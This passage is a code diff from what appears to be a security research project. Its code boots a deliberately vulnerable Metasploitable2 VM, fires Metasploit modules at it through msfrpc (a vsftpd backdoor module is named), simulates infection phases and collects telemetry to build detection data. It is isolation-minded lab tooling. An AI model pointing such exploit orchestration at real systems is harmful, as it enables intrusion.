or f"/tmp/cis490-target-{os.environ.get('SLOT', '0')}"
),
help="QEMU run dir (sockets + pidfile)",
)
parser.add_argument(
"--msfrpc-host", default=os.environ.get("MSFRPC_HOST", "127.0.0.1"),
)
parser.add_argument(
"--msfrpc-port", type=int,
default=int(os.environ.get("MSFRPC_PORT", "55553")),
)
parser.add_argument(
"--msfrpc-user", default=os.environ.get("MSFRPC_USER", "msf"),
)
parser.add_argument(
"--keep-vm",
action="store_true",
help="leave the VM running after the episode finishes",
)
parser.add_argument(
"--target-boot-timeout",
type=float,
default=180.0,
help="how long to wait for the guest's vulnerable service to listen",
)
parser.add_argument(
"--sample",
default=os.environ.get("SAMPLE_NAME"),
help="Pick a workload profile from the manifest by name. Fleet runner "
"passes this via SAMPLE_NAME env. Without it, falls back to the v1 yes-loop.",
)
parser.add_argument(
"--manifest",
default=str(Path(__file__).resolve().parent.parent / "samples" / "manifest.toml"),
)
args = parser.parse_args()
logging.basicConfig(
level=logging.INFO,
format="%(asctime)s %(levelname)s %(name)s %(message)s",
)
log = logging.getLogger("cis490.run_tier3_demo")
msfrpc_password = os.environ.get("MSFRPC_PASSWORD")
if not msfrpc_password:
log.error("MSFRPC_PASSWORD env var must be set")
return 2
repo_root = Path(__file__).resolve().parent.parent
launcher = repo_root / "vm" / "launch_target.sh"
modules_dir = repo_root / "exploits" / "modules"
module_path = modules_dir / f"{args.module}.toml"
if not module_path.exists():
log.error("no module config at %s", module_path)
return 2
module = load_module_config(module_path)
log.info("module loaded: %s (%s)", module.name, module.module_path)
sample = None
if args.sample:
manifest = SampleManifest.load(args.manifest)
sample = next((s for s in manifest.samples if s.name == args.sample), None)
if sample is None:
log.error("sample %r not in manifest %s", args.sample, args.manifest)
return 2
log.info("sample=%s profile=%s kind=%s",
sample.name, sample.profile, sample.kind)
run_dir = Path(args.run_dir)
if run_dir.exists():
import shutil
shutil.rmtree(run_dir)
run_dir.mkdir(parents=True, exist_ok=True)
pid_file = run_dir / "qemu.pid"
log.info("booting target VM via %s (RUN_DIR=%s)", launcher, run_dir)
env = os.environ.copy()
env["RUN_DIR"] = str(run_dir)
qemu = subprocess.Popen(
[str(launcher)],
cwd=str(repo_root),
env=env,
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL,
start_new_session=True,
)
try:
_wait_for_path(pid_file, timeout_s=15.0)
qemu_pid = int(pid_file.read_text().strip())
log.info("qemu pid = %d; waiting for service on %s:%d (timeout %.0fs)",
qemu_pid, args.target_ip, args.target_port,
args.target_boot_timeout)
_wait_for_tcp(args.target_ip, args.target_port, args.target_boot_timeout)
log.info("target service is up")
# Pre-exploit savevm so EpisodeConfig.revert_at_{start,end}
# has a known-good baseline to load. Best-effort — we still
# run the episode if savevm fails (just without revert
# support). See run_real_vm_demo.py for the same pattern.
qmp_sock = run_dir / "qmp.sock"
if qmp_sock.exists():
try:
_qmp = qmp.QMPClient(qmp_sock)
_qmp.connect()
try:
out = _qmp.savevm("baseline-v1")
log.info("savevm baseline-v1 OK: %s", out.strip()[:160])
finally:
_qmp.close()
except Exception as e:
log.warning("savevm failed; revert_at_start unusable: %s", e)
client = MSFRpcClient(
MSFRpcConfig(
host=args.msfrpc_host,
port=args.msfrpc_port,
user=args.msfrpc_user,
password=msfrpc_password,
)
)
cfg = EpisodeConfig(
target_pid=qemu_pid,
duration_s=sum(d for _, d in DEFAULT_SCHEDULE),
interval_ms=args.interval_ms,
data_root=Path(args.data_root),
phase_schedule=DEFAULT_SCHEDULE,
image_name=module.name + "-target",
snapshot_name="baseline-v1",
sample=sample,
exploit_meta={
"framework": "metasploit",
"module": module.module_path,
"module_type": module.module_type,
"module_name": module.name,
"payload": module.payload_path,
"rport": module.options.get("RPORT"),
"rhost_template": module.options.get("RHOSTS"),
},
)
runner = EpisodeRunner(cfg)
driver = MSFExploitDriver(
client=client,
module=module,
cfg=DriverConfig(
target_ip=args.target_ip,
sample_store_root=repo_root / "samples" / "store",
),
emit_event=runner.emit_event,
sample=sample,
)
runner.on_phase = driver.set_phase
driver.setup()
try:
result = runner.run()
finally:
driver.teardown()
print()
print(f"episode_id = {result.episode_id}")
print(f"path = {result.episode_dir}")
print(f"rows_proc = {result.rows_proc}")
print(f"phases = {result.phases_observed}")
print(f"module = {module.module_path}")
print()
print("To plot:")
print(f" uv run python tools/plot_envelope.py {result.episode_dir}")
return 0
finally:
if not args.keep_vm:
log.info("shutting down VM (pid=%d)", qemu.pid)
try:
os.killpg(os.getpgid(qemu.pid), signal.SIGTERM)
except ProcessLookupError:
pass
try:
qemu.wait(timeout=5)
except subprocess.TimeoutExpired:
os.killpg(os.getpgid(qemu.pid), signal.SIGKILL)
if __name__ == "__main__":
sys.exit(main())

View file

@ -22,21 +22,63 @@ fire and a real sample.
from __future__ import annotations
import logging
import sys
from pathlib import Path
from typing import Callable
from vm_serial import SerialClient
# Allow running as a script (sibling of tools/).
sys.path.insert(0, str(Path(__file__).resolve().parent.parent))
from exploits.workloads import Workload, workload_for # noqa: E402
from samples.manifest import Sample # noqa: E402
log = logging.getLogger("cis490.vm_load_controller")
EmitEvent = Callable[..., None]
class VMLoadController:
def __init__(self, serial: SerialClient) -> None:
"""Drives a real Alpine guest through the phase schedule for
Tier 2 (no exploit). Workload is chosen by ``sample.profile``
same profile catalog as the Tier-3 driver so a fleet wave
produces matched envelopes whether or not an exploit fires.
Without a sample, falls back to the original cpu-saturate yes-loop
(the original Tier-2 demo behaviour).
Every set_phase call emits an event into the runner's events.jsonl
so we can audit (a) whether the workload command actually got
sent, (b) whether the guest acknowledged it, and (c) whether the
expected process is running afterwards. Without those events,
silent failures (login partial, command swallowed by tty) produce
well-labeled but information-less episodes see CIS490 history
where every phase median'd 20% CPU on elliott-lab."""
def __init__(
self,
serial: SerialClient,
sample: Sample | None = None,
emit_event: EmitEvent | None = None,
) -> None:
self.s = serial
self.sample = sample
self.workload: Workload | None = workload_for(sample)
# No-op default so callers don't have to thread an emitter.
self.emit: EmitEvent = emit_event or (lambda *a, **kw: None)
def setup(self) -> None:
# Kill any pre-existing load and clear scratch space.
self._kill_load()
self.s.run("rm -f /tmp/payload /tmp/armed.log; echo setup-ok")
self.emit(
"workload_setup",
profile=self.workload.profile if self.workload else "v1-yes",
sample=self.sample.name if self.sample else None,
)
def teardown(self) -> None:
self._kill_load()
@ -44,29 +86,86 @@ class VMLoadController:
# ---- phases ---------------------------------------------------------
def set_phase(self, phase: str) -> None:
log.info("vm phase -> %s", phase)
if phase == "clean":
self._kill_load()
elif phase == "armed":
self.s.run("echo armed-handshake-$(date +%s) > /tmp/armed.log")
elif phase == "infecting":
self.s.run(
"dd if=/dev/urandom of=/tmp/payload bs=4k count=128 2>/dev/null && "
"chmod +x /tmp/payload"
log.info("vm phase -> %s (profile=%s)",
phase, self.workload.profile if self.workload else "v1")
try:
if phase == "clean":
self._kill_load()
self._emit_phase("workload_killed", phase)
elif phase == "armed":
self.s.run("echo armed-handshake-$(date +%s) > /tmp/armed.log")
self._emit_phase("workload_armed", phase)
elif phase == "infecting":
self.s.run(
"dd if=/dev/urandom of=/tmp/payload bs=4k count=128 2>/dev/null && "
"chmod +x /tmp/payload"
)
self._emit_phase("workload_infecting", phase)
elif phase == "infected_running":
self._kill_load()
if self.workload is not None:
self.s.run(self.workload.start_cmd)
else:
self.s.run(
"nohup sh -c 'yes > /dev/null' </dev/null >/dev/null 2>&1 & disown"
)
self._emit_phase("workload_started", phase)
elif phase == "dormant":
# Probe BEFORE we kill so we see whether the workload
# was actually running. If the probe says nothing was
# running, the previous infected_running was a no-op
# and the trainer should filter this episode.
probe = self._probe()
self._kill_load()
self._emit_phase("workload_killed", phase, pre_kill_probe=probe)
else:
log.warning("unknown phase: %s", phase)
except Exception as e:
# Don't propagate — the runner already swallows on_phase
# exceptions. But DO record so the episode is filterable.
log.exception("set_phase(%s) failed", phase)
self.emit(
"workload_failed",
phase=phase,
error=str(e)[:200],
profile=self.workload.profile if self.workload else "v1-yes",
)
elif phase == "infected_running":
self._kill_load()
# Background CPU burner. `nohup` + `&` + redirects to detach.
self.s.run(
"nohup sh -c 'yes > /dev/null' </dev/null >/dev/null 2>&1 & disown"
)
elif phase == "dormant":
self._kill_load()
else:
log.warning("unknown phase: %s", phase)
# ---- internals ------------------------------------------------------
def _kill_load(self) -> None:
# `true` at the end so the run() exit status is always 0.
if self.workload is not None:
self.s.run(self.workload.stop_cmd)
# Always sweep the v1 leftover commands too, in case we just
# switched profiles mid-fleet-run.
self.s.run("pkill yes 2>/dev/null; pkill stress-ng 2>/dev/null; true")
def _probe(self) -> dict:
"""Ask the guest what's actually running. Returns a small dict
the caller stamps into the event so trainers can detect the
"workload didn't fire" case from meta alone."""
try:
out = self.s.run(
"echo yes=$(pgrep -c yes 2>/dev/null || echo 0); "
"echo sh=$(pgrep -c sh 2>/dev/null || echo 0); "
"echo loadavg=$(awk '{print $1}' /proc/loadavg)"
)
stats: dict = {}
for line in out.splitlines():
line = line.strip()
if "=" not in line:
continue
k, _, v = line.partition("=")
stats[k.strip()] = v.strip()
return stats
except Exception as e:
return {"probe_error": str(e)[:120]}
def _emit_phase(self, event: str, phase: str, **extra) -> None:
self.emit(
event,
phase=phase,
profile=self.workload.profile if self.workload else "v1-yes",
sample=self.sample.name if self.sample else None,
**extra,
)

View file

@ -0,0 +1,274 @@
#!/usr/bin/env python3
"""In-guest telemetry agent — runs INSIDE the VM.
Writes one JSON-lines row per tick to a virtio-serial port that the
host has wired up as ``cis490.guest.agent``. The host-side collector
(`collectors.guest_agent`) reads these rows and stamps them with the
host's monotonic clock before persisting to ``telemetry-guest.jsonl``.
Stdlib only no `psutil`, no extra deps to bake into the guest. Every
field is read from /proc on the guest, so this works on busybox-based
Alpine, on Cirros, and on Metasploitable2 unchanged.
Wire path inside the guest:
/dev/virtio-ports/cis490.guest.agent
The host side opens the matching unix socket on the hypervisor.
The protocol is intentionally trivial: the agent emits newline-
delimited JSON; the host emits nothing back. One direction.
This source is the **deployable** side every row is tagged
``available_in_deployment: true``. See docs/threat-model.md.
"""
from __future__ import annotations
import argparse
import json
import os
import platform
import sys
import time
from typing import Any
SOURCE = "guest_agent"
AVAILABLE_IN_DEPLOYMENT = True
DEFAULT_PORT = "/dev/virtio-ports/cis490.guest.agent"
DEFAULT_INTERVAL_MS = 100 # 10 Hz
DEFAULT_TOP_N = 8
# ---------- /proc parsers ---------------------------------------------------
def _read(path: str) -> str | None:
try:
with open(path, "rb") as f:
return f.read().decode("ascii", errors="replace")
except (FileNotFoundError, PermissionError):
return None
def read_loadavg() -> tuple[float, float, float] | None:
text = _read("/proc/loadavg")
if text is None:
return None
parts = text.split()
return float(parts[0]), float(parts[1]), float(parts[2])
def read_meminfo() -> dict[str, int]:
text = _read("/proc/meminfo")
out: dict[str, int] = {}
if text is None:
return out
for line in text.splitlines():
k, _, rest = line.partition(":")
v = rest.strip()
if v.endswith(" kB"):
try:
out[k] = int(v[:-3]) * 1024
except ValueError:
pass
return out
def read_cpu_total() -> dict[str, int] | None:
"""First line of /proc/stat: aggregate cpu user/nice/sys/idle/...
in jiffies since boot."""
text = _read("/proc/stat")
if text is None:
return None
line = text.splitlines()[0]
fields = line.split()
# cpu user nice system idle iowait irq softirq steal guest guest_nice
if not fields or fields[0] != "cpu":
return None
nums = [int(x) for x in fields[1:]]
pad = nums + [0] * max(0, 10 - len(nums))
return {
"user": pad[0],
"nice": pad[1],
"system": pad[2],
"idle": pad[3],
"iowait": pad[4],
"irq": pad[5],
"softirq": pad[6],
"steal": pad[7],
"guest": pad[8],
"guest_nice":pad[9],
}
def read_thermal_milli_c() -> int | None:
"""Best-effort: /sys/class/thermal/thermal_zone0/temp."""
text = _read("/sys/class/thermal/thermal_zone0/temp")
if text is None:
return None
try:
return int(text.strip())
except ValueError:
return None
def read_net_devs() -> dict[str, dict[str, int]]:
"""Parse /proc/net/dev → {iface: {rx_bytes, tx_bytes, rx_pkts, tx_pkts}}."""
text = _read("/proc/net/dev")
out: dict[str, dict[str, int]] = {}
if text is None:
return out
lines = text.splitlines()
for line in lines[2:]:
if ":" not in line:
continue
name, _, rest = line.partition(":")
name = name.strip()
if name == "lo":
continue
cols = rest.split()
if len(cols) < 16:
continue
out[name] = {
"rx_bytes": int(cols[0]),
"rx_pkts": int(cols[1]),
"tx_bytes": int(cols[8]),
"tx_pkts": int(cols[9]),
}
return out
def read_listen_ports() -> list[int]:
"""TCP listen sockets from /proc/net/tcp + tcp6. State 0A = LISTEN."""
out: set[int] = set()
for path in ("/proc/net/tcp", "/proc/net/tcp6"):
text = _read(path)
if not text:
continue
for line in text.splitlines()[1:]:
cols = line.split()
if len(cols) < 4:
continue
if cols[3] != "0A":
continue
local = cols[1] # "ADDR:PORT" with PORT in hex
_, _, port_hex = local.rpartition(":")
try:
out.add(int(port_hex, 16))
except ValueError:
pass
return sorted(out)
def read_top_procs(top_n: int) -> list[dict[str, Any]]:
"""Top-N processes by RSS. Cheap O(N) scan of /proc."""
procs: list[dict[str, Any]] = []
try:
entries = os.listdir("/proc")
except OSError:
return procs
for ent in entries:
if not ent.isdigit():
continue
pid = int(ent)
stat = _read(f"/proc/{pid}/stat")
if stat is None:
continue
try:
rparen = stat.rindex(")")
comm = stat[stat.index("(") + 1 : rparen]
fields = stat[rparen + 2:].split()
utime = int(fields[11])
stime = int(fields[12])
rss_pages = int(fields[21])
except (ValueError, IndexError):
continue
procs.append({
"pid": pid,
"comm": comm[:32],
"cpu_jiffies": utime + stime,
"rss_bytes": rss_pages * os.sysconf("SC_PAGESIZE"),
})
procs.sort(key=lambda p: p["rss_bytes"], reverse=True)
return procs[:top_n]
# ---------- one tick --------------------------------------------------------
def collect_once(top_n: int = DEFAULT_TOP_N) -> dict[str, Any]:
mem = read_meminfo()
cpu = read_cpu_total()
load = read_loadavg()
return {
"t_guest_mono_ns": time.monotonic_ns(),
"t_guest_wall_ns": time.time_ns(),
"source": SOURCE,
"available_in_deployment": AVAILABLE_IN_DEPLOYMENT,
"kernel": platform.release(),
"cpu_total_jiffies": cpu,
"load_1m_5m_15m": list(load) if load else None,
"mem_total_bytes": (mem.get("MemTotal") or 0),
"mem_available_bytes": (mem.get("MemAvailable") or 0),
"mem_buffers_bytes": (mem.get("Buffers") or 0),
"mem_cached_bytes": (mem.get("Cached") or 0),
"swap_used_bytes": (mem.get("SwapTotal", 0) - mem.get("SwapFree", 0)),
"thermal_milli_c": read_thermal_milli_c(),
"net": read_net_devs(),
"listen_ports": read_listen_ports(),
"top_procs": read_top_procs(top_n),
}
# ---------- main loop -------------------------------------------------------
def main(argv: list[str] | None = None) -> int:
p = argparse.ArgumentParser(prog="cis490-guest-agent")
p.add_argument("--port", default=DEFAULT_PORT,
help="virtio-serial port path inside the guest")
p.add_argument("--interval-ms", type=int, default=DEFAULT_INTERVAL_MS)
p.add_argument("--top-n", type=int, default=DEFAULT_TOP_N)
p.add_argument("--once", action="store_true",
help="emit a single row and exit (for smoke tests)")
args = p.parse_args(argv)
if args.once:
sys.stdout.write(json.dumps(collect_once(args.top_n)) + "\n")
sys.stdout.flush()
return 0
# Open the virtio-serial port. If the host hasn't wired one up,
# fall back to stdout so the agent is testable on bare-metal too.
out_fp: Any
if os.path.exists(args.port):
out_fp = open(args.port, "wb", buffering=0)
else:
sys.stderr.write(f"[cis490-agent] {args.port} missing; writing to stdout\n")
out_fp = sys.stdout.buffer
interval_ns = args.interval_ms * 1_000_000
next_tick = time.monotonic_ns()
try:
while True:
row = collect_once(args.top_n)
out_fp.write((json.dumps(row) + "\n").encode("utf-8"))
try:
out_fp.flush()
except (AttributeError, OSError):
pass
next_tick += interval_ns
sleep_ns = next_tick - time.monotonic_ns()
if sleep_ns > 0:
time.sleep(sleep_ns / 1_000_000_000)
else:
next_tick = time.monotonic_ns()
except KeyboardInterrupt:
return 0
except (BrokenPipeError, OSError) as e:
sys.stderr.write(f"[cis490-agent] write failed: {e}\n")
return 1
if __name__ == "__main__":
sys.exit(main())

View file

@ -16,7 +16,17 @@ set -euo pipefail
REPO_ROOT="$(cd "$(dirname "$0")/.." && pwd)"
IMAGE="${IMAGE:-$REPO_ROOT/vm/images/alpine-baseline.qcow2}"
CIDATA="${CIDATA:-$REPO_ROOT/vm/images/cidata.iso}"
RUN_DIR="${RUN_DIR:-/tmp/cis490-vm}"
# SLOT lets the fleet runner spin up N concurrent VMs without socket /
# port collisions. Default RUN_DIR + ssh hostfwd port keep single-VM
# usage unchanged.
SLOT="${SLOT:-0}"
RUN_DIR="${RUN_DIR:-/tmp/cis490-vm-$SLOT}"
SSH_PORT="${SSH_PORT:-$((2222 + SLOT))}"
# When BRIDGE is set, attach a tap to the host-only bridge instead of
# using SLIRP usermode networking. The tap must already exist and be a
# member of the bridge — see vm/setup_bridge.sh + (operator) ip tuntap.
BRIDGE="${BRIDGE:-}"
TAP="${TAP:-cis490tap$SLOT}"
mkdir -p "$RUN_DIR"
QMP_SOCK="$RUN_DIR/qmp.sock"
@ -32,8 +42,14 @@ if [[ ! -f "$CIDATA" ]]; then
exit 1
fi
AGENT_SOCK="$RUN_DIR/agent.sock"
# snapshot=on routes guest writes through a temporary overlay so the qcow2
# on disk is never mutated — every boot starts from the same bytes.
#
# Second virtio-serial port (cis490.guest.agent) carries telemetry
# from the in-guest agent. Surfaces inside the guest at
# /dev/virtio-ports/cis490.guest.agent and on the host at $AGENT_SOCK.
exec qemu-system-x86_64 \
-name cis490-vm \
-machine q35,accel=kvm \
@ -42,8 +58,15 @@ exec qemu-system-x86_64 \
-m 256 \
-drive file="$IMAGE",format=qcow2,if=virtio,snapshot=on \
-drive file="$CIDATA",format=raw,if=virtio,readonly=on \
-netdev user,id=n0,hostfwd=tcp:127.0.0.1:2222-:22 \
$(if [[ -n "$BRIDGE" ]]; then \
echo -n "-netdev tap,id=n0,ifname=$TAP,script=no,downscript=no "; \
else \
echo -n "-netdev user,id=n0,hostfwd=tcp:127.0.0.1:$SSH_PORT-:22 "; \
fi) \
-device virtio-net-pci,netdev=n0 \
-device virtio-serial-pci,id=cis490vs0 \
-chardev socket,id=cis490agent,path="$AGENT_SOCK",server=on,wait=off \
-device virtserialport,chardev=cis490agent,name=cis490.guest.agent \
-nographic \
-serial unix:"$RUN_DIR/serial.sock",server=on,wait=off \
-monitor unix:"$MON_SOCK",server=on,wait=off \

117
vm/launch_target.sh Executable file
View file

@ -0,0 +1,117 @@
#!/usr/bin/env bash
# Boot the Tier-3 *target* VM (the intentionally-vulnerable guest the
# exploit fires against). Companion to ``launch_demo.sh``, which boots
# the *idle* Alpine guest used in Tiers 1-2.
#
# Networking note: this launcher uses SLIRP usermode networking with
# ``restrict=on`` plus an explicit ``hostfwd`` for each vulnerable port.
# That gives us:
# - the host can reach the guest's services (for msfrpcd + the
# exploit module to drive ``RHOSTS=127.0.0.1``)
# - the guest cannot reach the host or the internet (no NAT exit)
#
# The host-only ``br-malware`` bridge described in docs/architecture.md
# replaces SLIRP once the bridge-side pcap collector (source 4) lands —
# at which point payloads with ``reverse_tcp`` callbacks become viable
# too. Until then, we restrict module choices to ones that return a
# shell on the same socket they exploit (e.g. vsftpd_234_backdoor).
#
# Run-dir contract (read by run_tier3_demo.py):
# $RUN_DIR/qemu.pid
# $RUN_DIR/qmp.sock
# $RUN_DIR/monitor.sock
# $RUN_DIR/serial.sock
set -euo pipefail
REPO_ROOT="$(cd "$(dirname "$0")/.." && pwd)"
IMAGE="${IMAGE:-$REPO_ROOT/vm/images/metasploitable2.qcow2}"
SLOT="${SLOT:-0}"
RUN_DIR="${RUN_DIR:-/tmp/cis490-target-$SLOT}"
RAM_MIB="${RAM_MIB:-512}"
# When BRIDGE is set, attach a tap to the host-only bridge instead of
# using SLIRP. Pcap-feature episodes (source 4) require this.
BRIDGE="${BRIDGE:-}"
TAP="${TAP:-cis490target$SLOT}"
# Ports the host should forward to the guest. Comma-separated host:guest pairs.
# Default covers the vsftpd module's RPORT. Slot offset makes per-VM
# fleet runs collision-free (slot 0 → 21, slot 1 → 121, slot 2 → 221, ...).
PORT_BASE="${PORT_BASE:-$((21 + SLOT * 100))}"
TARGET_PORTS="${TARGET_PORTS:-${PORT_BASE}:21}"
# KVM if the host can take it; otherwise fall back to TCG. Cross-arch
# images (Metasploitable2 is x86-only) on aarch64 hosts will need TCG.
ACCEL="${ACCEL:-}"
mkdir -p "$RUN_DIR"
QMP_SOCK="$RUN_DIR/qmp.sock"
MON_SOCK="$RUN_DIR/monitor.sock"
PID_FILE="$RUN_DIR/qemu.pid"
SERIAL_SOCK="$RUN_DIR/serial.sock"
if [[ ! -f "$IMAGE" ]]; then
cat >&2 <<EOF
no target image at $IMAGE
Drop a vulnerable Linux qcow2 there. The canonical choice is
Metasploitable2 — see docs/sources.md for the download + sha256.
If the image is x86 and your host is not, set ACCEL=tcg explicitly.
EOF
exit 1
fi
# Build the netdev string. With BRIDGE set we use a tap on the host-only
# bridge (so source-4 pcap captures the traffic). Without it, SLIRP
# usermode + restrict=on for the no-egress smoke runs.
if [[ -n "$BRIDGE" ]]; then
NETDEV="tap,id=n0,ifname=$TAP,script=no,downscript=no"
else
NETDEV="user,id=n0,restrict=on"
IFS=',' read -ra _PAIRS <<< "$TARGET_PORTS"
for pair in "${_PAIRS[@]}"; do
host_port="${pair%%:*}"
guest_port="${pair##*:}"
NETDEV+=",hostfwd=tcp:127.0.0.1:${host_port}-:${guest_port}"
done
fi
# Pick acceleration: explicit override wins; otherwise use KVM if the
# device is present, else TCG.
if [[ -z "$ACCEL" ]]; then
if [[ -e /dev/kvm && -r /dev/kvm && -w /dev/kvm ]]; then
ACCEL="kvm"
else
ACCEL="tcg"
fi
fi
CPU_FLAGS=()
if [[ "$ACCEL" == "kvm" ]]; then
CPU_FLAGS=(-cpu host)
fi
AGENT_SOCK="$RUN_DIR/agent.sock"
# snapshot=on so the qcow2 is never mutated — every boot is identical.
# Second virtio-serial port carries the in-guest agent's telemetry to
# the host (see vm/guest-agent/). Targets without the agent installed
# (e.g. unmodified Metasploitable2) leave the device unused — the
# host-side collector simply gets no rows. Harmless.
exec qemu-system-x86_64 \
-name cis490-target \
-machine q35,accel="$ACCEL" \
"${CPU_FLAGS[@]}" \
-smp 1,sockets=1,cores=1,threads=1 \
-m "$RAM_MIB" \
-drive file="$IMAGE",format=qcow2,if=virtio,snapshot=on \
-netdev "$NETDEV" \
-device virtio-net-pci,netdev=n0 \
-device virtio-serial-pci,id=cis490vs0 \
-chardev socket,id=cis490agent,path="$AGENT_SOCK",server=on,wait=off \
-device virtserialport,chardev=cis490agent,name=cis490.guest.agent \
-nographic \
-serial unix:"$SERIAL_SOCK",server=on,wait=off \
-monitor unix:"$MON_SOCK",server=on,wait=off \
-qmp unix:"$QMP_SOCK",server=on,wait=off \
-pidfile "$PID_FILE" \
-display none

56
vm/setup_bridge.sh Executable file
View file

@ -0,0 +1,56 @@
#!/usr/bin/env bash
# Create the host-only ``br-malware`` bridge for Tier-3+ episodes.
#
# Properties (from docs/architecture.md):
# - Bridge address 10.200.0.1/24 on the host side.
# - NO NAT, NO route, NO DNS — guests cannot reach the host or the
# internet. The bridge only carries traffic between the host and
# the guests on it.
# - Lab-host and target VMs both attach via tap devices created by
# the launcher.
#
# Run as root, ONCE per host. Idempotent — re-running is safe.
set -euo pipefail
BRIDGE="${BRIDGE:-br-malware}"
BRIDGE_IP="${BRIDGE_IP:-10.200.0.1/24}"
log() { printf '[setup_bridge] %s\n' "$*" >&2; }
[[ $EUID -eq 0 ]] || { log "must run as root"; exit 1; }
if ! command -v ip >/dev/null; then
log "iproute2 (`ip`) is required"
exit 1
fi
if ! ip link show "$BRIDGE" >/dev/null 2>&1; then
log "creating bridge $BRIDGE"
ip link add name "$BRIDGE" type bridge
# Disable spanning-tree on the host-only bridge — it isn't needed
# and adds startup delay.
ip link set "$BRIDGE" type bridge stp_state 0
fi
ip link set "$BRIDGE" up
# Add the host-side address if not already there.
if ! ip -4 addr show dev "$BRIDGE" | grep -q "${BRIDGE_IP%%/*}"; then
log "adding $BRIDGE_IP to $BRIDGE"
ip addr add "$BRIDGE_IP" dev "$BRIDGE"
fi
# Make sure the kernel does NOT forward between this bridge and any
# other interface. We don't want a misconfigured net.ipv4.ip_forward
# to leak the malware bridge to the LAN.
if [[ "$(cat /proc/sys/net/ipv4/ip_forward)" == "1" ]]; then
log "WARNING: net.ipv4.ip_forward=1 — make sure iptmonads / nftables"
log "blocks traffic from $BRIDGE to non-loopback devices."
fi
log "bridge ready: $(ip -4 -br addr show "$BRIDGE")"
log ""
log "Launchers can now opt into tap+bridge mode by setting:"
log " BRIDGE=$BRIDGE (tells launch_target.sh to attach a tap to this bridge)"
log "Default launcher behaviour stays SLIRP usermode for simplicity."